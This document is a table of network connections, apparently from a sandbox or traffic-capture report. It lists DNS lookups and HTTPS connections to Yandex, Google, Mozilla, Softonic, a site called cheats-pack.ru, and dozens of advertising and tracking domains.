| RU | 213.180.204.158:443 | storage.mds.yandex.net | tcp |
| US | 8.8.8.8:53 | 90.193.180.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.247.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.131.154.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.204.180.213.in-addr.arpa | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| US | 8.8.8.8:53 | verify.yandex.ru | udp |
| RU | 93.158.134.90:443 | verify.yandex.ru | tcp |
| RU | 93.158.134.90:443 | verify.yandex.ru | tcp |
| US | 8.8.8.8:53 | 90.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ad.adriver.ru | udp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | pixel.adlooxtracking.ru | udp |
| US | 8.8.8.8:53 | 1688870564.verify.yandex.ru | udp |
| RU | 195.209.108.38:443 | ad.adriver.ru | tcp |
| US | 172.67.223.193:443 | pixel.adlooxtracking.ru | tcp |
| US | 8.8.8.8:53 | 193.223.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.108.209.195.in-addr.arpa | udp |
| RU | 31.31.198.49:443 | cheats-pack.ru | tcp |
| US | 104.17.247.203:443 | unpkg.com | tcp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 216.58.213.6:443 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| GB | 216.58.213.6:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.212.202:443 | jnn-pa.googleapis.com | udp |
| GB | 216.58.212.202:443 | jnn-pa.googleapis.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.244.181.201:443 | prod.balrog.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| DE | 23.53.40.129:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.40.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.200.14:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-aigl6ney.gvt1.com | udp |
| GB | 142.250.200.14:443 | redirector.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1---sn-aigl6ney.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 166.183.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c48.gcp.gvt2.com | udp |
| US | 35.206.35.210:443 | e2c48.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 210.35.206.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| GB | 142.250.178.14:443 | www.youtube.com | tcp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | e2c59.gcp.gvt2.com | udp |
| IT | 34.154.74.59:443 | e2c59.gcp.gvt2.com | tcp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| IL | 34.0.72.251:443 | e2c77.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 59.74.154.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.72.0.34.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| BE | 64.233.166.94:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c25.gcp.gvt2.com | udp |
| FR | 34.155.84.81:443 | e2c25.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 94.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.84.155.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| US | 8.8.8.8:53 | e2c64.gcp.gvt2.com | udp |
| US | 34.162.18.59:443 | e2c64.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 8.8.8.8:53 | 59.18.162.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.212.202:443 | jnn-pa.googleapis.com | udp |
| GB | 216.58.212.202:443 | jnn-pa.googleapis.com | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 8.8.8.8:53 | images.sftcdn.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | sdk.privacy-center.org | udp |
| US | 8.8.8.8:53 | softonic.com | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| BE | 104.68.82.93:443 | images.sftcdn.net | tcp |
| BE | 104.68.82.93:443 | images.sftcdn.net | tcp |
| BE | 104.68.82.93:443 | images.sftcdn.net | tcp |
| BE | 104.68.82.93:443 | images.sftcdn.net | tcp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 199.232.213.91:443 | softonic.com | tcp |
| US | 199.232.213.91:443 | softonic.com | tcp |
| US | 3.161.82.43:443 | sdk.privacy-center.org | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| DE | 13.224.186.120:443 | c.amazon-adsystem.com | tcp |
| BE | 104.68.82.93:443 | images.sftcdn.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | udp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| GB | 142.250.187.238:443 | www.adsensecustomsearchads.com | tcp |
| US | 3.161.82.43:443 | sdk.privacy-center.org | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.datadoghq-browser-agent.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| US | 13.33.218.24:443 | www.datadoghq-browser-agent.com | tcp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| GB | 142.250.178.2:443 | partner.googleadservices.com | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| DE | 13.224.186.120:443 | c.amazon-adsystem.com | tcp |
| DE | 18.245.31.92:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| US | 8.8.8.8:53 | adservice.googlesyndication.com | udp |
| GB | 172.217.169.59:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.213.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.82.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.82.161.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.186.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.218.33.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.31.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | notix.io | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| NL | 139.45.197.227:443 | notix.io | tcp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.52.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.197.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.privacy-center.org | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | id.crwdcntrl.net | udp |
| DE | 18.245.86.71:443 | api.privacy-center.org | tcp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 13.33.173.196:443 | aax.amazon-adsystem.com | tcp |
| DE | 162.19.138.118:443 | id5-sync.com | tcp |
| IE | 63.33.74.9:443 | id.crwdcntrl.net | tcp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| US | 178.128.135.204:443 | brightcombid.marphezis.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | tcp |
| IE | 34.246.39.119:443 | ad.360yield.com | tcp |
| DE | 162.19.138.118:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| DE | 18.245.86.71:443 | api.privacy-center.org | udp |
| US | 8.8.8.8:53 | 849f3ab953915a146d389290339a5507.safeframe.googlesyndication.com | udp |
| GB | 142.250.187.238:443 | www.adsensecustomsearchads.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| DE | 141.95.98.64:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ampcid.google.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.169.65:443 | 849f3ab953915a146d389290339a5507.safeframe.googlesyndication.com | tcp |
| GB | 216.58.212.206:443 | ampcid.google.com | tcp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| US | 216.239.34.181:443 | analytics.google.com | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | 196.173.33.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.74.33.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.253.220.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.63.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.241.63.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.39.246.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.36.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.135.128.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.98.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.167.233.64.in-addr.arpa | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | dis.eu.criteo.com | udp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| GB | 172.217.16.238:443 | syndicatedsearch.goog | tcp |
| NL | 178.250.1.9:443 | dis.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| IE | 34.255.28.200:443 | rtb.gumgum.com | tcp |
| IE | 34.255.28.200:443 | rtb.gumgum.com | tcp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 181.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.28.255.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ce.lijit.com | udp |
| IE | 34.253.176.232:443 | ce.lijit.com | tcp |
| US | 8.8.8.8:53 | ice.360yield.com | udp |
| IE | 54.155.95.204:443 | ice.360yield.com | tcp |
| US | 8.8.8.8:53 | rtd-tm.everesttech.net | udp |
| US | 151.101.2.49:443 | rtd-tm.everesttech.net | tcp |
| US | 8.8.8.8:53 | 232.176.253.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.95.155.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| NL | 35.214.223.82:443 | csync.loopme.me | tcp |
| US | 8.8.8.8:53 | 82.223.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | js-sec.indexww.com | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | visitor.omnitagjs.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| DE | 162.55.233.28:443 | sync.richaudience.com | tcp |
| US | 151.101.1.108:443 | acdn.adnxs.com | tcp |
| US | 104.18.38.76:443 | js-sec.indexww.com | tcp |
| SE | 23.34.232.193:443 | ads.pubmatic.com | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| BE | 104.90.24.23:443 | contextual.media.net | tcp |
| DE | 162.55.233.28:443 | sync.richaudience.com | tcp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | api-2-0.spot.im | udp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 54.175.125.175:443 | sync.srv.stackadapt.com | tcp |
| US | 52.86.219.200:443 | cs-server-s2s.yellowblue.io | tcp |
| IE | 52.48.246.250:443 | match.prod.bidr.io | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| GB | 185.64.191.214:443 | image8.pubmatic.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| DE | 18.245.31.128:443 | api-2-0.spot.im | tcp |
| US | 8.8.8.8:53 | ssc-cms.33across.com | udp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| US | 8.8.8.8:53 | player.aniview.com | udp |
| SE | 184.31.15.24:443 | player.aniview.com | tcp |
| US | 8.8.8.8:53 | cacerts.rapidssl.com | udp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| SE | 192.229.221.95:80 | cacerts.rapidssl.com | tcp |
| DE | 51.89.9.251:443 | onetag-sys.com | tcp |
| FR | 91.134.110.133:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | jadserve.postrelease.com | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | bttrack.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| IE | 52.19.156.32:443 | jadserve.postrelease.com | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | tcp |
| US | 192.132.33.68:443 | bttrack.com | tcp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | sync.targeting.unrulymedia.com | udp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| IE | 63.32.137.205:443 | pr-bh.ybp.yahoo.com | tcp |
| GB | 172.217.16.226:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | sync.aniview.com | udp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 8.8.8.8:53 | 108.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.232.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.24.90.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.233.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.246.48.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.31.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.125.175.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.219.86.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.105.202.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.134.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.156.19.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hbx.media.net | udp |
| US | 8.8.8.8:53 | secure-assets.rubiconproject.com | udp |
| SE | 23.34.232.19:443 | hbx.media.net | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | udp |
| BE | 104.68.78.171:443 | secure-assets.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | c21lg-d.media.net | udp |
| US | 8.8.8.8:53 | medianet-match.dotomi.com | udp |
| US | 8.8.8.8:53 | us-u.openx.net | udp |
| DE | 51.89.9.251:443 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.com | udp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 35.244.159.8:443 | us-u.openx.net | tcp |
| SE | 23.34.232.19:443 | c21lg-d.media.net | tcp |
| SE | 23.34.232.19:443 | c21lg-d.media.net | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| NL | 64.158.223.140:443 | medianet-match.dotomi.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| US | 74.121.140.211:443 | sync.mathtag.com | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| FR | 154.54.250.81:443 | ads.stickyadstv.com | tcp |
| US | 104.22.50.98:443 | spl.zeotap.com | tcp |
| GB | 185.64.191.210:443 | image2.pubmatic.com | tcp |
| IE | 67.220.226.233:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| NL | 198.47.127.205:443 | simage2.pubmatic.com | tcp |
| DE | 52.29.4.131:443 | rtb.mfadsrvr.com | tcp |
| BE | 104.90.26.20:443 | eus.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | mwzeom.zeotap.com | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| BE | 104.90.24.23:443 | contextual.media.net | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | cs.media.net | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| US | 8.8.8.8:53 | cdn.indexww.com | udp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| NL | 193.0.160.131:443 | p.rfihub.com | tcp |
| US | 104.18.24.173:443 | a.tribalfusion.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| DE | 18.158.94.28:443 | match.sharethrough.com | tcp |
| IE | 52.49.45.15:443 | sync.crwdcntrl.net | tcp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| DE | 3.71.149.231:443 | ups.analytics.yahoo.com | tcp |
| DK | 37.157.4.29:443 | c1.adform.net | tcp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| NL | 34.91.62.186:443 | um.simpli.fi | tcp |
| US | 8.8.8.8:53 | inmobi-match.dotomi.com | udp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| NL | 89.207.16.201:443 | inmobi-match.dotomi.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | sync.search.spotxchange.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| US | 8.8.8.8:53 | dsum.casalemedia.com | udp |
| BE | 104.90.26.20:443 | eus.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | pubmatic-match.dotomi.com | udp |
| NL | 89.207.16.137:443 | pubmatic-match.dotomi.com | tcp |
| US | 8.8.8.8:53 | pixel.tapad.com | udp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| US | 8.8.8.8:53 | 205.137.32.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.33.132.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.186.46.96.in-addr.arpa | udp |
